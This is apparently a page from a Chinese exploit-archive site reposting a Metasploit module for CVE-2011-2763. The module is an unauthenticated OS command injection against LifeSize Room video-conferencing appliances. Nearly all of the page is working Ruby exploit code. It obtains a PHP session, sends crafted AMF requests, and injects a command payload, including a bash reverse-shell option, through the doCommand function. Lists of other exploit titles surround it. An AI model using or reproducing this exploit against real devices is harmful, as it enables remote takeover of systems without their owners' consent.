首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LifeSize Room Command Injection
来源:http://www.metasploit.com 作者:Spencer 发布时间:2011-08-29  
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'LifeSize Room Command Injection',
            'Description'    => %q{
                This module exploits a vulnerable resource in LifeSize
                Room  versions 3.5.3 and 4.7.18 to inject OS commmands.  LifeSize
                Room is an appliance and thus the environment is limited
                resulting in a small set of payload options.
            },
            'Author'    =>
                [
                    'Spencer McIntyre',
                    # Special Thanks To Chris Murrey
                    'SecureState R&D Team'
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 6 
, 'References' => [ [ 'CVE', '2011-2763' ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 65535, # limited by the two byte size in the AMF encoding 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp', } }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', { } ] ], 'DisclosureDate' => 'July 13 2011', 'DefaultTarget' => 0)) register_advanced_options( [ OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.17) Gecko/20110428 Fedora/3.6.17-1.fc14 Firefox/3.6.17']) ], self.class) end def exploit print_status("Requesting PHP Session...") res = send_request_cgi({ 'encode' => false, 'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}", 'method' => 'GET', }, 10) if not res.headers['set-cookie'] print_error('Could Not Obtain A Session ID') return end sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, 'Content-Type' => 'application/x-amf', } print_status("Validating PHP Session...") res = send_request_cgi({ 'encode' => false, 'uri' => '/gateway.php', 'data' => "\x00\x00\x00\x00\x00\x02\x00\x1bLSRoom_Remoting.amfphpLogin\x00\x02/1\x00\x00\x00\x05\x0a\x00\x00\x00\x00\x00\x17LSRoom_Remoting.getHost\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00", 'method' => 'POST', 'headers' => headers, }) if not res print_error('Could Not Validate The Session ID') return end print_status("Sending Malicious POST Request...") # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19LSRoom_Remoting.doCommand\x00\x02\x2f\x37\xff\xff\xff\xff\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}\x02\x00\x0dupgradeStatus" res = send_request_cgi({ 'encode' => false, 'uri' => '/gateway.php?' << sessionid, 'data' => amf_data, 'method' => 'POST', 'headers' => headers }, 10) end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mini-stream Ripper 2.9.7.273 (
·HTTPKiller - FHTTP Kit by Xian
·Portable Saint Paint Studio Lo
·Apache httpd Remote Denial of
·Groovy Media Player Version 2.
·Mini FTP Server 1.1 Buffer Cor
·yahoo! player 1.5 (.m3u) Unive
·Free MP3 CD Ripper 1.1 DEP Byp
·Windows7/win2008 提权0day
·Free MP3 CD Ripper 1.1 Local B
·Free MP3 CD Ripper 1.1 Buffer
·Sunway Force Control SCADA 6.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved